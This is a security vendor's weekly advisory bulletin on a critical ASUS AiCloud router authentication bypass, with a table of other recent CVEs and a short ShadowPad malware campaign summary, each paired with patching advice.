ASUS warns of a critical authentication vulnerability in AiCloud routers.
ASUS warns of a critical authentication vulnerability in AiCloud routers.
ASUS warns of a critical authentication vulnerability in AiCloud routers.
Severity: CRITICAL (CVE-2025-59366)
CVSS v4.0 Score : 9.2
Information
ASUS AiCloud is a personal cloud service that lets you connect to and access your data anytime, anywhere by turning your ASUS router into a personal cloud server. It works with USB storage devices connected to the router to stream files, back up data, and share files via the AiCloud mobile app (iOS/Android) or through a web link.
Incident
CVE-2025-59366 is an authentication bypass vulnerability in AiCloud. This flaw may be caused by an unintended side effect of the Samba function, which could allow certain features to be accessed without proper authorization.
ASUS has released new firmware to fix nine security vulnerabilities, including a critical authentication bypass in routers with AiCloud enabled.AiCloud is a remote cloud access feature included in many ASUS routers, which turns the routers into personal cloud servers for remote media streaming and cloud-based data storage.
According to ASUS, the CVE-2025-59366 vulnerability may result from unintended side effects of Samba functionality, potentially allowing unauthorized actions.A remote, unauthenticated attacker can exploit this flaw through path traversal and OS command injection attacks. These attack methods are low complexity and do not require user interaction.
Although there are currently no reports of active exploitation of CVE-2025-2492, such attacks are commonly used to install malware or enlist devices into botnets for DDoS attacks. Therefore, ASUS router users are strongly advised to upgrade to the latest firmware as soon as possible.
Recommendation
It is recommended to update your router to the latest released firmware.
The important things is Security systems. We must concern and monitor as usual.
For more information please contact
Email :sales@inetms.co.th
065 149 2822 (Ms.Suphatson )
063 204 4534 (Ms.Atsamaphorn)
065 929 6330 (Ms.Kansinee)
061 387 9439 (Ms.Sirilak)
092 257 6902 (Ms.Narusorn)
063 197 7510 (Mr.Yanotai)
065 725 7405 (Ms.Nattharini)
References
- https://www.bleepingcomputer.com/news/security/asus-warns-of-new-critical-auth-bypass-flaw-in-aicloud-routers/
- https://nvd.nist.gov/vuln/detail/CVE-2025-59366
- https://www.techtalkthai.com/asus-warns-critical-authentication-bypass-vulnerability-routers-aicloud/
- https://thehackernews.com/2025/04/asus-confirms-critical-flaw-in-aicloud.html
Weekly Interesting CVE
| NO. |
CVE Name |
Published Date |
Last Update |
Device/Appplication/OS Target |
Attack Type |
CVSS |
Detail |
Solution |
Reference |
|---|---|---|---|---|---|---|---|---|---|
| 1 |
CVE-2025-13597 |
25/11/2025 |
25/11/2025 |
AI Feeds Plugin for WordPress <= 1.0.11 |
Arbitrary File Upload / Remote Code Execution (RCE) |
9.8 |
Unauthenticated attackers can exploit the actualizador_git.php file to download arbitrary GitHub repositories and overwrite existing plugin files. This allows for the injection of malicious scripts, leading to Remote Code Execution (RCE) and full website compromise. |
Update the AI Feeds plugin to the latest version (newer than 1.0.11) or uninstall it immediately if no patch is available. |
|
| 2 |
CVE-2025-59366 |
25/11/2025 |
25/11/2025 |
ASUS Router Firmware (AiCloud feature |
Authentication Bypass |
10.0 |
(Critical Auth Bypass) This vulnerability arises from Samba functionality, allowing attackers to bypass authentication and access critical router functions without logging in. If the feature is enabled, it can lead to full device control or unauthorized access to AiCloud data. |
Update to the latest firmware or temporarily disable the AiCloud feature. |
|
| 3 |
CVE-2025-12977 |
24/11/2025 |
25/11/2025 |
Fluent Bit (Input Plugins: in_http, in_splunk, in_elasticsearch) |
Path Traversal / Arbitrary File Write |
8.7 |
Attackers can compromise log data integrity via Path Traversal in the tag_key parameter. This enables Arbitrary File Write, allowing attackers to overwrite critical files or configurations, which may escalate to Remote Code Execution (RCE). Additionally, it allows for log misrouting or log injection. |
Update Fluent Bit to version 4.1.0 or later and ensure strict input validation for the tag_key parameter. |
https://www.cvedetails.com/cve/CVE-2025-12977/
|
| 4 |
CVE-2025-62691 |
25/11/2025 |
25/11/2025 |
MaLion (Windows) < 7.1.1.9, MaLionCloud < 7.2.0.1 |
Stack-based Buffer Overflow (RCE) |
5.3 |
Attackers can send a specially crafted HTTP request to trigger a Buffer Overflow. This allows for unauthenticated remote code execution (RCE) with SYSTEM privileges, potentially leading to full system compromise. |
Update MaLion Security Point (Windows) to version 7.1.1.9 or later, and MaLionCloud to version 7.2.0.1 or later. |
|
| 5 |
CVE-2024-47856 |
24/11/2025 |
25/11/2025 |
RSA Authentication Agent for Microsoft Windows < 7.4.7 |
Path Interception / Unquoted Service Path |
9.2 |
(Local Privilege Escalation) The vulnerability is caused by an unquoted service path in the Agent, which may lead Windows to execute an unintended executable. Attackers can exploit this by placing a malicious file in the path to execute code with SYSTEM privileges. |
Update to RSA Authentication Agent version 7.4.7 or later. |
https://nvd.nist.gov/vuln/detail/CVE-2024-47856 |
Malware News or Campaign IOC/IOA | EN
|
No |
Campaign Name |
Detection Date |
Attack Type |
Description |
Mitigation/Remediation |
|---|---|---|---|---|---|
| 1 |
ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access |
24/11/2025 |
Remote Code Execution |
Hackers are reportedly exploiting a critical vulnerability in Windows Server Update Services (WSUS) to continue distributing the ShadowPad malware. This follows the release of a proof-of-concept (PoC) vulnerability, codenamed CVE-2025-59287, which allows attackers to “execute arbitrary code on a machine,” giving them complete control over the server if they haven’t patched Microsoft’s recently released patch. Once compromised, hackers use PowerShell to gain control over the machine and then download the ShadowPad malware using commands like certutil and curl. ShadowPad is a highly sophisticated “backdoor” malware capable of evading detection and remaining invisible on the machine. It uses DLL side-loading techniques to disguise itself as a legitimate file. Worryingly, this malware is linked to state-sponsored hacking groups and is commonly used to target large organizations, particularly critical infrastructure and organizations. Experts warn that the number of attacks following the release of the PoC has increased rapidly, and the severity is expected to continue to increase unless organizations promptly patch and patch their WSUS systems. |
|
Ref: https://thehackernews.com/2025/11/shadowpad-malware-actively-exploits.html
09 December 2025
Viewed 220 time
